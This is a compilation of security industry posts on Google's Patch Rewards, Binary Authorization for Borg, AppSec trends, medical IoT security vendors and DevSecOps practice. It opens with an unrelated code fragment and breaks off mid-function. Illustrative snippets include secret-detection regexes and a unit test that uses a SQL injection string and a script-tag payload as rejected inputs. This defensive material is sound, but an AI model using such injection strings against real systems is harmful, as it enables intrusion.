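trials = [("A", True), ("A", True), ("A", False),
          ("B", True), ("B", False), ("B", False)]
rates = match_rate_by_group(trials)
# The differential is the gap between the best- and worst-served group
differential = max(rates.values()) - min(rates.values())
```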

NICE Webinar: Shopping Safely Online and the Work of Cybersecurity Awareness and Behavior Change

The PowerPoint slides used during this webinar can be downloaded here. Speaker: Lance Spitzner, Director, SANS Security Awareness. Synopsis: ‘Tis the season for online holiday shopping . . . but you Better Watch Out for online scams or the CyberGrinch will steal your holiday joy. Aside from making consumers aware of safe online practices, performing the work of cybersecurity awareness training is an important part of any organization’s information security program. This webinar will provide timely tips for staying safe online during the holiday season and will make the case for inclusion in the

Announcing updates to our Patch Rewards program in 2020


At Google, we strive to make the internet safer and that includes recognizing and rewarding security improvements that are vital to the health of the entire web. In 2020, we are building on this commitment by launching a new iteration of our Patch Rewards program for third-party open source projects.

Over the last six years, we have rewarded open source projects for security improvements after they have been implemented. While this has led to overall improved security, we want to take this one step further.

Introducing upfront financial help
Starting on January 1, 2020, we’re not only going to reward proactive security improvements after the work is completed, but we will also complement the program with upfront financial support to provide an additional resource for open source developers to prioritize security work. For example, if you are a small open source project and you want to improve security, but don’t have the necessary resources, this new reward can help you acquire additional development capacity.

We will start off with two support levels:
  • Small ($5,000): Meant to motivate and reward a project for fixing a small number of security issues. Examples: improvements to privilege separation or sandboxing, cleanup of integer arithmetic, or more generally fixing vulnerabilities identified in open source software by bug bounty programs such as EU-FOSSA 2 (see ‘Qualifying submissions’ here for more examples).
  • Large ($30,000): Meant to incentivize a larger project to invest heavily in security, e.g. by providing support to find additional developers or implementing a significant new security feature (e.g. new compiler mitigations).
Nomination process

Anyone can nominate an open source project for support by filling out the form at http://goo.gle/patchz-nomination. Our Patch Reward Panel will review submissions on a monthly basis and select a number of projects that meet the program criteria. The panel will let submitters know if a project has been chosen and will start working with the project maintainers directly.

Projects in scope

Any open source project can be nominated for support. When selecting projects, the panel will put an emphasis on projects that either are vital to the health of the Internet or are end-user projects with a large user base.

What do we expect in return?

We expect to see security improvements to open source software. Ideally, the project can provide us
with a short blurb or pointers to some of the completed work that was possible because of our support. We don’t want to add bureaucracy, but would like to measure the success of the program.
What about the existing Patch Rewards program?
This is an addition to the existing program; the current Patch Rewards program will continue as it stands today.

NIST Scientists and Engineers Pitch Innovations to Venture Capitalists

The Technology Partnerships Office (TPO) at the National Institute of Standards and Technology (NIST), on December 02, 2019, brought to life an event that merged the innovations of federal laboratories with commercial industry, forming partnerships to grow the nation’s economy. The Technology Maturation Accelerator Program (TMAP) was designed as a challenge for NIST scientists and engineers to bring to the table their most promising research projects that may have the largest commercial impact on society. Establishing the first ever TMAP at NIST fell in line with the President’s Management

Protecting programmatic access to user data with Binary Authorization for Borg


At Google, the safety of user data is our paramount concern and we strive to protect it comprehensively. That includes protection from insider risk, which is the possible risk that employees could use their organizational knowledge or access to perform malicious acts. Insider risk also covers the scenario where an attacker has compromised the credentials of someone at Google to facilitate their attack. There are times when it’s necessary for our services and personnel to access user data as part of fulfilling our contractual obligations to you: as part of their role, such as user support; and programmatically, as part of a service. Today, we’re releasing a whitepaper, “Binary Authorization for Borg: how Google verifies code provenance and implements code identity,” that explains one of the mechanisms we use to protect user data from insider risks on Google's cluster management system Borg.

Binary Authorization for Borg is a deploy-time enforcement check

Binary Authorization for Borg, or BAB, is an internal deploy-time enforcement check that reduces insider risk by ensuring that production software and configuration deployed at Google is properly reviewed and authorized, especially when that code has the ability to access user data. BAB ensures that code and configuration deployments meet certain standards prior to being deployed. BAB includes both a deploy-time enforcement service to prevent unauthorized jobs from starting, and an audit trail of the code and configuration used in BAB-enabled jobs.

BAB ensures that Google's official software supply chain process is followed. First, a code change is reviewed and approved before being checked into Google's central source code repository. Next, the code is verifiably built and packaged using Google's central build system. This is done by creating the build in a secure sandbox and recording the package's origin in metadata for verification purposes. Finally, the job is deployed to Borg, with a job-specific identity. BAB rejects any package that lacks proper metadata, that did not follow the proper supply chain process, or that otherwise does not match the identity’s predefined policy.
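The whitepaper describes Google's internal systems; as a rough, simplified illustration of a deploy-time provenance check, the sketch below records build metadata keyed by package digest and rejects packages without it. All names and the policy logic are hypothetical and are not BAB's actual implementation:

```python
import hashlib

# Hypothetical provenance ledger: package digest -> metadata recorded at build time
PROVENANCE = {}

def record_build(package_bytes, source_ref, reviewed):
    """Called by the trusted build system: remember where a package came from."""
    digest = hashlib.sha256(package_bytes).hexdigest()
    PROVENANCE[digest] = {"source_ref": source_ref, "reviewed": reviewed}
    return digest

def admit_job(package_bytes, require_review=True):
    """Deploy-time check: reject packages lacking build metadata, or built
    from code that was never reviewed."""
    digest = hashlib.sha256(package_bytes).hexdigest()
    meta = PROVENANCE.get(digest)
    if meta is None:
        return False   # not produced by the trusted pipeline
    if require_review and not meta["reviewed"]:
        return False
    return True

pkg = b"binary-contents"
record_build(pkg, "repo@abc123", reviewed=True)
print(admit_job(pkg))                  # True
print(admit_job(b"tampered-binary"))   # False: unknown digest
```

The key property mirrored here is that any tampering with the package changes its digest, so the enforcement point can tie a running job back to a specific, reviewed build.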

Binary Authorization for Borg allows for several kinds of security checks

BAB can be used for many kinds of deploy-time security checks. Some examples include:
  • Is the binary built from checked in code?
  • Is the binary built verifiably?
  • Is the binary built from tested code?
  • Is the binary built from code intended to be used in the deployment?
After deployment, a job is continuously verified for its lifetime, to check that jobs that were started (and any that may still be running) conform to updates to their policies.

Binary Authorization for Borg provides other security benefits
Though the primary purpose of BAB is to limit the ability of a potentially malicious insider to run an unauthorized job that could access user data, BAB has other security benefits. BAB provides robust code identity for jobs in Google’s infrastructure, tying a job’s identity to specific code, and ensuring that only the specified code can be used to exercise the job identity’s privileges. This allows for a transition from a job identity—trusting an identity and any of its privileged human users transitively—to a code identity—trusting a specific piece of reviewed code to have specific semantics and which cannot be modified without an approval process.

BAB also dictates a common language for data protection, so that multiple teams can understand and meet the same requirements. Certain processes, such as those for financial reporting, need to meet certain change management requirements for compliance purposes. Using BAB, these checks can be automated, saving time and increasing the scope of coverage.

Binary Authorization for Borg is part of the BeyondProd model
BAB is one of several technologies used at Google to mitigate insider risk, and one piece of how we secure containers and microservices in production. By using containerized systems and verifying their BAB requirements prior to deployment, our systems are easier to debug, more reliable, and have a clearer change management process. More details on how Google has adopted a cloud-native security model are available in another whitepaper we are releasing today, “BeyondProd: A new approach to cloud-native security.”

In summary, implementing BAB, a deploy-time enforcement check, as part of Google’s containerized infrastructure and continuous integration and deployment (CI/CD) process has enabled us to verify that the code and configuration we deploy meet certain standards for security. Adopting BAB has allowed Google to reduce insider risk, prevent possible attacks, and also support the uniformity of our production systems. For more information about BAB, read our whitepaper, “Binary Authorization for Borg: how Google verifies code provenance and implements code identity.”

Additional contributors to this whitepaper include Kevin Chen, Software Engineer; Tim Dierks, Engineering Director; Maya Kaczorowski, Product Manager; Gary O’Connor, Technical Writing; Umesh Shankar, Principal Engineer; Adam Stubblefield, Distinguished Engineer; and Wilfried Teiken, Software Engineer; with special recognition to the entire Binary Authorization for Borg team for their ideation, engineering, and leadership.

AppSec Themes to Watch in 2020

Contributors:

Paul Farrington, Veracode EMEA CTO

Pejman Pourmousa, Veracode VP of Services

Chris Wysopal, Veracode CTO and co-founder

As we said in the introduction to our 10th anniversary State of Software Security report this year, the last 10 years in AppSec saw both enormous change, and a fair amount of stagnation. Part of the reason for the stagnation is that software development is increasing at unprecedented rates, and security is often struggling to keep up. So as we shift our focus from reflection to prediction, we think application security in 2020 will be all about new solutions and best practices to keep up with the pace of development and empower developers to code both quickly and securely. A few AppSec themes we expect to see renewed focus on in 2020 include:

Security champions

With a security skills shortage, and an explosion of software development, it's time to get creative to spread security skills and know-how across development teams. A security champions program is becoming a popular way to do this, and we expect to see more of these programs in 2020. In a recently released report, Building an Enterprise DevSecOps Program, security analyst Adrian Lane notes, "I spoke with three midsized firms this week; their development personnel ranged from 800-2000 people, while their security teams ranged from 12 to 25." In the same report, he says of assigning security champions to development teams, "Regardless of how you do it, this is an excellent way to scale security without scaling headcount, and we recommend you set aside some budget and resources; it returns far more benefits than it costs."

A security champion is a developer with an interest in security who helps amplify the security message at the team level. Security champions don't need to be security pros; they just need to act as the security conscience of the team, keeping their eyes and ears open for potential issues. Once the team is aware of these issues, it can then either fix the issues in development or call in your organization's security experts to provide guidance.

With a security champion, an organization can make up for a lack of security coverage or skills by empowering a member of the development team to act as a force multiplier who can pass on security best practices, answer questions, and raise security awareness.

Metrics that make sense

Metrics, or perhaps more accurately the right metrics, are crucial for understanding what's really happening in your AppSec program. They serve a dual purpose: they demonstrate your organization's current state, and also show what progress it's making in achieving its objectives.

On the flip side, focusing on the wrong metrics can lead to frustration, disengagement, and a stalled program. If you've got an overly stringent AppSec policy, for instance "fix all flaws found within two weeks," your metrics will not paint a pretty picture, and your developers will give up before they've begun. We think 2020 will be the year of getting AppSec metrics right with smart, achievable, sensible AppSec policies.

We will increasingly see a focus on providing developers with simple cues to encourage the right behavior, but in a realistic way. For example, teams start by classifying those security bugs that are highest priority, those that are important but not showstoppers, and those that, although not ideal, are acceptable to exist. Especially for the first two categories, they then track the average time to fix a security bug, baseline, and then negotiate targets so that engineers and product owners can buy-in. These metrics may ultimately help to determine compensation, but perhaps initially are linked to softer benefits for the team.
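Baselining average time-to-fix per severity class, as described above, can be as simple as the following sketch (the severity labels and figures are illustrative):

```python
from statistics import mean

def mean_time_to_fix(bugs):
    """bugs: (severity, days_to_fix) pairs for closed security bugs.
    Returns the average fix time per severity class."""
    by_severity = {}
    for severity, days in bugs:
        by_severity.setdefault(severity, []).append(days)
    return {sev: mean(d) for sev, d in by_severity.items()}

# Illustrative figures only
bugs = [("high", 5), ("high", 9), ("medium", 30), ("low", 90)]
baseline = mean_time_to_fix(bugs)
print(baseline)
```

Once a baseline like this exists, targets can be negotiated per class rather than imposing a single blanket deadline across all flaws.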

Security across the pipeline

We're seeing organizations start to build security into each phase of the development pipeline, and expect to see more of this shift in 2020. From pre-commit scans in the IDE (my code), to build scans in the CI pipeline (our code), to deployment scans in the CD pipeline (production code), security testing will cover code from inception to production.
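As a toy illustration of the earliest of these checks, the sketch below scans staged text for credential-shaped strings before a commit is allowed. The patterns are simplified examples; real pre-commit hooks use maintained rulesets from dedicated secret scanners:

```python
import re

# Simplified example patterns; not a complete or authoritative ruleset
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),                        # AWS access key id shape
    re.compile(r"-----BEGIN (RSA |EC )?PRIVATE KEY-----"),  # PEM private key header
]

def scan(staged_text):
    """Return True if the staged text looks like it contains a credential."""
    return any(p.search(staged_text) for p in SECRET_PATTERNS)

print(scan('aws_key = "AKIAABCDEFGHIJKLMNOP"'))  # True: blocks the commit
print(scan("print('hello')"))                    # False: commit proceeds
```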

Scaling

DevSecOps is no longer niche; organizations are moving faster and producing more software than ever before. Scaling is the name of the AppSec game in 2020. AppSec programs that are cumbersome or slow to scale will not last in this new decade. What are the keys to scaling AppSec?

A SaaS-based solution: The time and budget required to quickly scale an on-premises AppSec solution make it ill equipped for a modern DevSecOps environment.

Expert help: Outside AppSec expertise can be useful in helping to establish your security program's goals and roadmap. More importantly, it can help keep your roadmap on track by guiding developers through the fixing of flaws your scans find.

Security champions: As we discussed in the section above, security champions will be key to doing more with less security staff.

Regulations

More and more security regulations are specifically calling out the need for application security, from NIST to PCI, NY DFS, and GDPR. In turn, the need for a documented application security process will become paramount in the new year. The Financial Services Sector Cybersecurity Profile from the FSSCC is an example of how FinTech firms are trying to unify reporting standards for the various regulatory frameworks.

Demand for secure software

IT buyers are increasingly questioning the security of software they are purchasing. If you can't answer questions about your security practices or can't address your customers' audit requirements, you're likely to experience lost or delayed sales opportunities. In some cases, prospects will turn elsewhere. However, vendors that can address these security concerns quickly and effectively stand out among suppliers and leverage security as a competitive advantage. A recent survey report we conducted with IDG found that 96 percent of respondents are more likely to consider doing business with a vendor or partner whose software has been independently verified as "secure."

In addition, thanks to the speed of modern software delivery, we will see the methods for attesting to the security of software change. For example, we anticipate a shift to process-based attestations, such as proof of the security of an application's development process (as with Veracode Verified), rather than point-in-time third-party pen tests. Point-in-time tests will carry less and less weight as the speed of software updates and changes increases.

What's behind this demand for proof of security? It stems in part from new, more dire impacts from security breaches. When Target was breached in 2013, it created headlines for a few weeks, but it didn't really affect its bottom line. Today, that has changed. Now we are seeing acquisitions fail, CEOs lose jobs, and stock values take hits because of breaches. Proving your software is secure will give companies an advantage in 2020.

Learn more

Continue the conversation: join the discussion on AppSec in 2020 in our upcoming webinar, AppSec in 2020: What's on the Horizon.

5 Promising vendors focusing on Cyber Security for Medical IoT (IoMT)

Medical IoT devices operate in care facility environments that encompass care giving, case management, customer service, and clinic management. As such, the risk of data gathered and managed by medical devices extends beyond the device itself. A compromise of clinic management services can propagate to IoT device command and control, allowing compromise of devices in attacks that do not directly touch the device at all. This is clearly the major driver for the emerging category of “Medical IoT (IoMT) Cyber Security”.

A large hospital, for example, could be home to as many as 85,000 connected devices. While each of these devices has a significant role in the delivery of care and operational efficiency, each connected device also opens the door to a malicious cyberattack. A recent report from Irdeto found that 82 percent of healthcare organizations’ IoT devices have been targeted with a cyberattack within the last year.

Going over the players in this industry, it is clear that the Medical IoT security category includes a number of different approaches with the common goal of providing the customer with clear asset discovery and timely alerting on security breaches and attacks on its medical environment.

Although many large security players are addressing this niche too, CyberDB identified a number of emerging players that are focusing on this industry, and as such we expect them to benefit from the growth in this market. These players are profiled below (in alphabetical order).

Due to the clear use case and the growing awareness and need in this market, we can see general-purpose IoT security players moving towards the Medical IoT security market.

According to a recent report by BisResearch, the overall Medical IoT cyber security market has been witnessing steady growth and is expected to continue growing at a double-digit CAGR of 41.38% during the forecast period 2019-2028.

CyberMDX

CyberMDX is a pioneer in medical cyber security, delivering visibility, threat prevention and analytics for medical and IoT devices and clinical assets. It is a best-of-breed product built from the ground up for healthcare delivery organizations. CyberMDX was established in 2017, operates globally, and has raised $10M in funding to date. It is headquartered in Tel Aviv and New York City.

CyberMDX counters and prevents growing cyber threats against hospitals, ensuring the operational continuity of their critical assets as well as patient and data safety. CyberMDX delivers endpoint visibility, network threat prevention and operational analytics for medical, IoT, and OT devices. The agentless solution automates the most granular, context-aware device profiling available on the market and combines it with healthcare-tailored risk assessment and remediation capabilities.

Using CyberMDX, healthcare teams can easily:

  • Audit devices for software vulnerabilities and prioritize patching
  • Detect malicious activity and behavioral anomalies, triggering responses accordingly
  • Manage risks proactively via smart micro-segmentation planning and automation
  • Streamline clinical compliance programs
  • Report device-relevant FDA recalls
  • Optimize device allocation and procurement decisions based on usage insights
  • Track and manage medical asset lifecycles
  • Provide rich reports in support of HIPAA and corporate compliance efforts
  • Seamlessly integrate with existing cyber and IT solutions to enrich data sets, enhance workflows, and enable operational excellence

Differentiators

  1. Interdepartmental HDO functionality and true workflow enablement: CyberMDX takes a holistic, 360° view of healthcare organizations and understands that only by building a common frame of reference and cross-departmental synergies can wholesale progress be achieved. Beyond mere security, CyberMDX provides security, IT, clinical engineering and compliance teams with a platform for data-driven workflow enablement and collaboration.
  2. Unmatched, context-aware visibility: CyberMDX delivers deep visibility into medical devices, protocols, and connected things of all sorts — along with a clear-eyed view of their clinical context. This deep and contextual visibility drives prevention, incident response, risk mitigation, and lifecycle management (including patch availability notifications). The solution covers medical devices, IoT, and OT across the entire network — providing a single pane of glass from which to view all connected healthcare assets.
  3. Superior depth and breadth of risk reporting around clinical and critical assets: CyberMDX has a dedicated research team focused solely on connected healthcare and IoMT. The team works with medical device manufacturers and regulatory bodies such as CISA, ECRI, MITRE and the FDA to spot and lock down cybersecurity hazards and vulnerabilities before they can be exploited by malicious actors.


Cynerio

Cynerio was established in 2017 by a versatile team with expertise in cybersecurity, medical devices, and healthcare IT. Headquartered in New York City, Cynerio works with leading Healthcare Delivery Organizations (HDOs) worldwide and delivers the only medical-first cybersecurity solution clinical ecosystems require to stay secure and operate with the peace of mind they need to put their focus where it’s needed most: on patient care.

The Problem

The IoT is an emerging space with a broad sphere of challenges that gets even more complicated when placed in the healthcare context. Hospitals and other HDOs have limited visibility into which devices exist on their networks, device behavior, and vulnerabilities. This limited visibility and understanding impairs IT personnel’s ability to remediate without interrupting patient care.

Securing the healthcare IoT poses the multifold challenge of securing medical devices developed without security in mind. Many of these devices run on outdated operating systems and can’t be patched. Hospital staff often has limited knowledge of the scope of security risks and vulnerabilities introduced to the network by unprotected devices. This is further complicated by traditional security solutions that are ineffective in dealing with connected devices in general.

Hospitals also rely on various non-traditional medical devices to help deliver essential care, such as elevators used to transport patients and smart refrigerators used to store sensitive biological material and medications. These devices are connected to the clinical ecosystem and are involved in medical workflows but are often not given the proper priority when evaluating the security strategy.

The Solution

Cynerio’s holistic, medical-first approach to healthcare/medical IoT cybersecurity management provides HDOs with a one-stop shop they can rely on, prioritizing patient care and privacy above all else while contextualizing risk and remediation within the framework of healthcare business goals. This approach to security allows HDOs to gain control over their clinical assets, helping them achieve immediate security goals and meet strategic, long-term objectives.

Cynerio’s agentless and nonintrusive solution analyzes device communications and behavior to provide ongoing, accurate, and contextual assessments of risk and security posture. This enables swift remediation without impacting operations.


Medigate

 

Medigate is a comprehensive platform for IoT cybersecurity. Distinguished by powerful capabilities driving use-cases that have revolutionized expectations around what clinical visibility can mean, Medigate is successfully partnering with health systems across the world to monetize risk-reduction practices.

Not unlike other industries, Healthcare’s vaunted digital transformation is based on unprecedented, new levels of visibility. Although having the ability to identify connected endpoints represents a step forward, it is not the game-changer. Rather, it’s the device-specific, detailed attribution and utilization metrics passively captured by Medigate that competitively separates its offering. Made even more real by meaningful and fully operationalized integrations to the systems that can naturally benefit (e.g. NAC, firewalls, SIEM, CMMS and emerging applications in supply chain, procurement and finance), Medigate’s excellent track record with some of the nation’s largest health systems is easily verified.

It is not “magic” and Medigate’s engineering-heavy company profile reflects it. Medigate has done the heavy lift required to passively fingerprint all connected assets, including serially connected modules and/or devices “hidden” behind legacy and modern integration points. The approach is known as deep packet inspection (DPI).  Having invested in the engineering talent required to effectively parse the transmission flows between devices, nested modules, integration points and their payload destinations (e.g. EMRs), Medigate delivers the most detailed and accurate baselines available, while also providing continuously monitored, dynamic views of the entire connected ecosystem.

Emboldened by widely publicized and successful attacks, the FDA’s changing guidance, Joint Commission directives and the recognition by acute care providers that ultimately, it’s a patient safety issue, risk capital has poured into the problem space. Validating Medigate’s approach, competitors use deep packet inspection (DPI) when they can and rely on probabilistic methods (i.e. behavioral models promoted as AI) when they cannot. For DICOM and other protocols packaged in the HL7 framework, all vendors use DPI, but that’s as far as they go, and that’s a seminal difference. Solution evaluators should investigate that difference and make up their own minds.

Medigate’s deterministic approach relies on its proven ability to resolve more than one hundred unique medical device protocols encompassing thousands of common devices that would otherwise go uncovered. The skillsets required to do that, and the resulting superior data quality, have fueled far more meaningful system integrations, non-traditional cross functional collaborations and numerous new use-cases that are turning risk reduction into a more strategically diverse, revenue creation practice. In terms of clinical network visibility, Medigate-powered “views” of what’s now possible are strengthening IT’s ROI mission to the enterprise.


Sternum

Sternum, the multilayered cybersecurity solution offering real-time, embedded protection for IoT devices, was founded in 2018 in Tel Aviv by a team of highly experienced R&D and business leaders. Sternum has a profound understanding of embedded systems and deep insights into the dynamics of today’s threats, offering a new standard of cybersecurity for medical IoT devices. In accordance with the FDA’s pre-market cybersecurity guidelines (which included our commentary), and with unique technology that ensures the security of all connected medical devices, Sternum is protecting patients’ lives.

The result: Robust defense of lifesaving devices such as pacemakers and insulin pumps by mitigating known threats while simultaneously adapting to and combating new ones.

 

The company has developed two holistic solutions:

  • Sternum’s Embedded Integrity Verification (EIV) identifies and blocks cyberattacks in real time. This integrity-based attack prevention can be deployed to any medical device, including distributed and unmanaged IoT devices. EIV operates like an on-device firewall, validating each operation within the device. EIV only needs to be deployed once. Once EIV is installed, every new piece of code (including 3rd party) receives protection automatically, fitting into the low resource environment of medical devices and providing security throughout the device’s lifecycle.
  • Sternum’s Real-time IoT Event Monitoring System (RIEMS) provides first-of-its-kind visibility from within IoT devices (including operating systems and other 3rd party components) so that OEMs who manufacture the devices, enterprises who implement them, and consumers who use them are immediately alerted to indications of any cyber breach, including prevented attack attempts. RIEMS also continuously monitors devices outside managed networks, enabling OEMs to maintain control of product security for all distributed devices.

How is Sternum’s software-only product suite revolutionary in the medical IoT world?

  • Sternum, as a high-diversity and platform-agnostic solution, is the only on-device, real-time cybersecurity solution supporting all types of real-time operating systems (RTOS) and homegrown OS.
  • Sternum’s solution operates during runtime with exceptionally low overhead of 3%.
  • Because it operates in real time, the solution thwarts zero-day attacks.
  • While network security solutions fail to adequately secure today’s distributed medical devices, Sternum provides real-time monitoring of devices outside managed networks.
  • Cyberattack prevention with Sternum’s EIV solution is near-perfect: in benchmark testing with RIPE (Runtime Intrusion Prevention Evaluator) against over 170 cyberattacks, 96.5% were prevented.

Sternum’s unique, flexible cyber security solution for the Internet of Medical Things (IoMT) can be seamlessly integrated with any medical device’s operating system and development process.


VDOO

Founded in 2017 by serial cybersecurity entrepreneurs Netanel Davidi and Uri Alter, VDOO has raised $45 million from top-tier investors including 83North, Dell Technology Capital, WRVI Capital, GGV Capital, NTT DOCOMO Ventures and MS&AD Ventures. The company currently has more than 65 employees at its offices in the US, Japan and Israel, and dozens of well-known customers around the globe including Medtronic, Stanley Healthcare, NTT and MS&AD.

With device security quickly becoming a strategic imperative for the healthcare market, product security teams that work on medical devices cannot keep making long-term decisions based on a partial picture of possible vulnerabilities at a single stage of the device lifecycle. In order to scale their ability to provide optimal security, they must replace the time- and resource-intensive point solutions they are using today with a single integrated platform.

This is where VDOO comes in. Our Product Security Platform for Connected Devices is the only automated security solution that is integrated across the entire medical device lifecycle – from design and development all the way to deployment, post-deployment and legacy. The end-to-end platform includes modules for security analysis, gap resolution, regulatory compliance, embedded protection, operations monitoring, executive insights and threat intelligence.

VDOO’s unique approach to providing optimal security for medical devices is based on the combination of our patented technology with advanced binary analysis and highly sophisticated machine learning capabilities. This is augmented by our research team, which includes some of the world’s leading embedded security experts, that has built the most comprehensive device security database available today based on the thorough analysis of hundreds of millions of binaries and tens of thousands of connected products.

The VDOO platform’s key differentiators and benefits:

  1. Contextual and focused device-specific security – Speed up time-to-market and reduce the risk of attacks by cutting out the noise and focusing on the right threats
  2. Automated security processes for the entire device lifecycle – Improve the efficiency of SDLC processes, reducing operational resource requirements across the board
  3. Verified compliance with leading standards and regulations – Increase product sales while improving customer adoption by ensuring that all devices are compliant
  4. Full visibility into the software supply chain – Reduce dependency on third parties by owning your security, thus lowering legal, monetary and reputational risks
  5. Comprehensive end-point security visibility and analytics – Monetize security as a business model by offering monitoring and protection services to end-users


The post 5 Promising vendors focusing on Cyber Security for Medical IoT (IoMT) appeared first on CyberDB.

Making Moves: How to Successfully Transition to DevSecOps

As we look toward the future, it is becoming critical that development organizations are not only agile and flexible but, just as important, secure. In turn, security and development need to work together more closely than ever before. When security and development are in unison, organizations can produce higher-quality code faster and more securely while reducing costs and conforming to regulations. Most companies realize that DevSecOps is the true nirvana, but they are not sure how to get there.

For starters, a successful transition to DevSecOps means that security and development teams need to reevaluate their roles. Ensuring the stability and security of software is no longer just the security team’s responsibility; it now includes developers as well. Developers should be testing, and security professionals should now be governing the testing. This culture shift can be a real challenge given that most security professionals have never worked alongside development teams and are not familiar with their processes, priorities, or tools. But once security and development teams are able to successfully work hand in hand, DevSecOps is achievable.

With this culture shift in mind, how do we formulate an AppSec strategy that transforms DevOps into DevSecOps? In its new report, Building an Enterprise DevSecOps Program, analyst firm Securosis provides an outline of the security tools and techniques needed at each stage in the software development lifecycle:

Define and Architect Phase

Reference security architectures: Reference security architectures (or service provider guidelines for cloud services) to understand the rules and policies that dictate how applications operate and communicate. Once you are familiar with the security architecture, you should work with development to come up with operational standards. Some important operational standards to consider include minimal security testing requirements, time frames for fixing issues, and when to break a build.

Security requirements: Decide which security tests should be run prior to deployment. Are you going to test for OWASP Top Ten vulnerabilities?

Monitoring and metrics: Consider what metrics you need to improve releases or problematic code or to determine what is working well. You should also think about what data you want to collect and build it into your CI/CD and production environments to measure how your scripts and tests perform.

Design Phase

Security design principles: Follow security design and operational principles because they offer valuable security improvement recommendations. Following these principles can be time consuming, but IT and development typically help because it benefits them as well.

Secure the deployment pipeline: Ensure that development and test environments are secure. Set up strict access controls for CI/CD pipelines and additional monitoring for scripts running continuously in the background.

Threat modeling: Teach the development team about common threat types and help them plan out tests to address attacks. If your security team is not able to address threat monitoring internally, you can consider hiring a consultant.

Develop Phase

Automate: Automating security testing at this phase is key.

Secure code repositories: Make it easy for developers to get secure and internally approved open source libraries. How? Consider keeping local copies of approved, easy-to-access libraries, and use a combination of composition analysis tools and scripts to make sure developers are using the approved versions.
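A minimal sketch of the "approved versions" check described above, using hypothetical package names and an in-code allow-list; in practice this would be backed by a software composition analysis tool and an internal registry:

```python
# Sketch: verify pinned dependencies against an internally approved
# allow-list. Package names and versions here are illustrative only.

APPROVED = {
    "requests": {"2.31.0", "2.32.3"},
    "flask": {"3.0.3"},
}

def check_requirements(lines):
    """Return a list of (package, version, reason) violations."""
    violations = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks and comments
        name, _, version = line.partition("==")
        name = name.lower()
        if name not in APPROVED:
            violations.append((name, version, "not an approved library"))
        elif version not in APPROVED[name]:
            violations.append((name, version, "version not approved"))
    return violations

reqs = ["requests==2.19.0", "flask==3.0.3", "leftpad==1.0.0"]
for pkg, ver, why in check_requirements(reqs):
    print(f"BLOCKED {pkg}=={ver}: {why}")
```

A script like this can run as a CI gate so unapproved libraries never reach a build.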

Security in the scrum: Set up your "security champions" program, training selected members of the development teams in security basics, to help with these security tasks.

Test-driven development: Consider incorporating security into test-driven development, where tests are constructed along with code.
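One way to picture security-focused test-driven development: the tests for a (hypothetical) input validator are written first, and the implementation then has to satisfy them. The validator and payloads below are illustrative, not from the report:

```python
# Sketch: TDD applied to security. The test cases encode the threat
# model (injection payloads) before the validator is implemented.
import re

def is_valid_username(value):
    """Accept only short alphanumeric usernames; rejects injection payloads."""
    return bool(re.fullmatch(r"[A-Za-z0-9_]{3,32}", value))

def test_username_rejects_injection():
    assert is_valid_username("alice_01")
    assert not is_valid_username("admin'; DROP TABLE users;--")
    assert not is_valid_username("<script>alert(1)</script>")
    assert not is_valid_username("")

test_username_rejects_injection()
print("security unit tests passed")
```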

Interactive Application Security Testing (IAST): Analyze your application’s code using IAST. The IAST scanner aims to find security vulnerabilities before you launch code into production.

Test Phase

Design for failure: The thought process behind this concept is, if there is a flaw with your application, it is better that you break it than an attacker.

Parallelize security testing: Address security tests that are slowing down your deployments by running multiple tests in parallel. Reconfiguring test environments for efficiency helps with Continuous Integration.
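The parallelization idea can be sketched with a thread pool; the scan names and timings below are stand-ins for real tools (SAST, dependency audit, secret scanning) invoked from a CI job:

```python
# Sketch: independent security scans run concurrently instead of serially,
# so total wall time approaches the duration of the slowest single scan.
import time
from concurrent.futures import ThreadPoolExecutor

def run_scan(name, seconds):
    time.sleep(seconds)  # simulate an external scanner's runtime
    return name, "pass"

scans = [("sast", 0.2), ("dependency-audit", 0.2), ("secret-scan", 0.2)]

start = time.perf_counter()
with ThreadPoolExecutor() as pool:
    results = list(pool.map(lambda s: run_scan(*s), scans))
elapsed = time.perf_counter() - start

print(results)  # three 0.2 s scans finish in roughly 0.2 s, not 0.6 s
```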

Pre-Release Phase

Elasticity: Leverage on-demand elastic cloud services to speed up security testing.

Test data management: Prevent unnecessary data breaches by locking down production environments so quality assurance and development personnel cannot exfiltrate regulated data or bypass your security controls. Consider using tools like data masking or tokenization, which deliver test data derived from production data but without the sensitive information.
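A minimal sketch of masking and tokenization, assuming hypothetical field names and an illustrative key; real deployments would use a dedicated masking tool with keys managed outside test environments:

```python
# Sketch: deriving safe test data from a production-like record. Direct
# identifiers are replaced with HMAC-based tokens (stable, so joins still
# work across tables) and partially masked for readability.
import hashlib
import hmac

TOKEN_KEY = b"illustrative-key-rotate-in-practice"

def tokenize(value):
    """Stable, keyed token that cannot be reversed to the original value."""
    return hmac.new(TOKEN_KEY, value.encode(), hashlib.sha256).hexdigest()[:12]

def mask_record(record):
    return {
        "customer_id": tokenize(record["customer_id"]),
        "card_number": "****-****-****-" + record["card_number"][-4:],
        "amount": record["amount"],  # non-sensitive fields pass through
    }

prod_row = {"customer_id": "C-10293", "card_number": "4111111111111111", "amount": 42.50}
print(mask_record(prod_row))
```

Because the token is keyed and deterministic, the same customer maps to the same token everywhere in the test data set, preserving referential integrity without exposing the real identifier.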

Deploy Phase

Manual vs. automated deployment: Use automation whenever possible. It is okay to use some manual processes, but it is important to remember that the more you automate, the more capacity the team will have to test and monitor.

Deployment and rollback: Start by using smoke tests to make sure that the test code that worked in pre-deployment still works in deployment. Then, if you need to augment deployment, use one of these three techniques. The first is Blue-Green or Red-Black deployment, where old and new code run simultaneously on their own sets of servers. The rollout is simple and, if errors are uncovered, the load balancers are pointed back to the older code. The second is canary testing. In canary testing, a small subset of individual sessions is directed toward the new code. If errors are encountered and the canary dies, the new code is retired until the issue is fixed. Lastly, feature tagging enables and disables new code elements. If errors are found in a new section of code, you can toggle off the feature until it is fixed.
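The canary and feature-tagging patterns above can be sketched together; the flag name, percentage, and routing scheme here are illustrative assumptions, not from the report:

```python
# Sketch: a deterministic canary (a fixed slice of sessions sees the new
# code) combined with a feature flag that lets operators toggle the new
# path off without a redeploy if "the canary dies".
import hashlib

CANARY_PERCENT = 5
FLAGS = {"new-checkout": True}  # hypothetical feature tag

def in_canary(session_id, percent=CANARY_PERCENT):
    # Hash-based bucketing: the same session always lands in the same bucket.
    digest = hashlib.sha256(session_id.encode()).digest()
    return digest[0] * 100 // 256 < percent

def handler_for(session_id):
    if FLAGS["new-checkout"] and in_canary(session_id):
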